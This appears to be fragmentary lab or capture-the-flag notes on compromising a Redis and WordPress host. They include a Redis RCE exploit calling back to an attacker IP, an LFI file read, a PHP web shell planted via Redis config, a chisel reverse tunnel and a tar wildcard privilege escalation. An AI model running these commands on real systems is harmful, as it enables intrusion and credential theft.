redis-cli -h 192.168.159.166
Then to authenticate:
Failed
We can get a shell:
python3 redis-rce.py -r 192.168.159.166 -L 192.168.45.223 -a 'Ready4Redis?' -f exp.so
Then set up a listener:
Now we can look for the wp-config file and get the database password:
cat /var/www/html/wp-config.php
Checking netstat:
Can not proceed as we get a shell as redis user
Success
We can check the service files for redis using the LFI:
curl http://192.168.231.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/systemd/system/redis.service > redis.service
Then write a shell.php:
redis-cli -h 192.168.231.166
AUTH Ready4Redis?
config set dir /opt/redis-files
config set dbfilename shell.php
set test '<?php system($_GET["cmd"]); ?>'
save
Now we can look for the wp-config file and get the database password:
cat /var/www/html/wp-config.php
$P$Ba5uoSB5xsqZ5GFIbBnOkXA0ahSJnb0
Kali:
chisel server --reverse --socks5 -p 8001
But we don't find anything in database after logging in.
Now we have tar with *
which we can use to gain sudo access:
cd /var/www/html
echo "" > '--checkpoint=1'
echo "" > '--checkpoint-action=exec=sh payload.sh'
nano payload.sh
chmod +x payload.sh
sudo rlwrap nc -nlvp 80